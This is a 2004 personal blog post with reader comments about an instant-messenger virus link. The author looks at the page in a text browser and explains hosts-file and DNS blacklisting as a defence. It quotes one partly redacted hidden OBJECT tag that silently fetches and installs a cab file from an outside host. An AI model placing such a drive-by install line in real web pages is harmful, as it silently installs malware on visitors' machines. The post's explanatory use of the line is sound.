Hierarchical virus control - that yellow bastard

recent entries:
friends | friends2:
my friendfeed:
about me:

about me advice art atlanta being yellow books cars climbing comics dad fic food games gaming geekism go gators hell is... holy crap home insomnia language meme money movies music odd poetry poker politics quotes singletude spam tech this sucks travel tv why i rule why i suck work

more bastard
bronze vip archives
notes of a code poet
furious ming
dude check this out
that bastard multiples

that bastard suggests
cap'n ken
coffee achiever
el guapo
bad news hughes

the stack
secret history:

the queue
battlestar galactica::

recent posts
+ glenn66

February 11th, 2004

Previous Entry Share Next Entry
2004.0211.1631::Hierarchical virus control
[ | ]
Today, K, a former co-worker of mine messaged me out of the blue:
check this out... [some URL that I've edited out but had "osama capture" in the filename]
The last time I had heard from K was probably about two years ago, after I was laid of from Cox, so in my curiosity, I went ahead and clicked on the link and got a nondescript page.

And nothing happened.

You see, I'm running Linux at work, and those wonderfully magic things that happen when most people go to random web addresses don't always happen to me.

Which in this case would be a good thing.

See, later on, K would send me the following message:
if you get a link from me, don't click on it. it's some kind of virus
Given my natural programmer's curiosity, I went to the site with my text-based browser and found the following line:
<OBJECT ID="ShellInstaller" WIDTH=0 HEIGHT=0 CLASSID="<some-junk>" CODEBASE="http:// [a buddylinks.net web address] /ShellInstaller.cab#Version=1,0,0,001">
Knowing what I know about Windows and its ilk, I figured that the fine folks at buddylinks.net have figured out how to automatically install and run an application from a webpage--an application which runs through your buddy list and sends every person on it a message.

It occured to me that there would be a very nice and easy way of getting rid of said Internet jackasses. If you've ever installed Kazaa Lite, you might know that one of the things installed along with the program is a new Windows hosts file.

Most of the time, the internet has its own way of resolving internet addresses (it's called DNS). If your computer doesn't know what www.joewebsite.com is, it asks another computer if it knows, which can ask another, and so on sort of like that shampoo commercial, but in a more organized and hierarchical fashion. The hosts file, however, is like a personal address book of internet IP addresses--ones which might not agree with what that big hierarchical system might provide.

Your average user will never care to use or even see what's going on in the hosts file. The reason Kazaa Lite installs a new one is the kind folk who make the application have harvested a bunch of the addresses of the more annoying netizens--advertisers, popup purveyors, those kind of guys--and have pointed their addresses at your own.

How does this help? Well, unlike the U.S. Postal Service, the web works on a request basis. You tell your computer "give me google," and it finds google and downloads it. Advertisers sneak their messages in with the messages that you download, essentially piggybacking on things that you request--"hey, computer, while you're getting website A, go to website B and download other crap."

So the hosts file that Kazaa Lite installs has set most of the common "website Bs" around the world to your own address (, which, if you're the average user, isn't running web server software and doesn't have advertisements. Your web browser tries to find the ad image or the pop up code, and when it fails, it just stops trying. It's like a little workaround for the popup ad problem, at least for that one ad on your computer.

How does this relate to an Instant Messenger virus?

The host file can pretty much eliminate a given offender from the internet for a single computer. Imagine, if you will, taking the domain name of a known virus purveyor (say, www.buddylinks.net), and entering it into the big hierarchical system as or some other innocuous address. That replacement address would effectively blacklist the offending site for all the computers that trusted the DNS service of that portion of the hierarchy.

Granted, I'm neither a system administrator nor an expert in DNS, but given the proliferation of Internet assholes, I'm liking this idea more and more...

3 comments | Leave a comment )


glenn66::2004.02.11.09:42 pm
[User Picture]The only limitation is those Internet Assholes always have "First Stike" capability before they are "entered into the big hierarchical system"

Sadly most internet users do not have up to date anti-virus definitions, up to date or any firewall SW or up to date anti-ad sw.

I've been lucky as most of my recent time have been Administrating systems with Lotus Notes e-mail instead of MS-Exchange, many viruses are ineffective since only targeted for Outlook/Outlook Express (But then again most people will also use their Outlook/Outlook Express for personal e-mail). Although my Lotus Notes users would be succeptable to your example due to them still using IE and such.
thepeopleseason::2004.02.12.02:09 pm::Re:
[User Picture]The only limitation is those Internet Assholes always have "First Stike" capability before they are "entered into the big hierarchical system"

Yeah, but it'd be lovely to see Administrators gang up on a given site and say, "Sorry, you're a bad netizen, you'll hereby get no more traffic from us." AOL (despite their eternal September userbase) would have an enormous amount of power in this regard.

umm...actually maybe that's a bad idea....:{
glenn66::2004.02.12.03:11 pm::Re:
[User Picture]I have a feeling microsoft.com and intel.com and irs.gov would end up on that "Bad Netzien" list just because of deep rooted hatred by the majority of System Admins :D
Go to Top: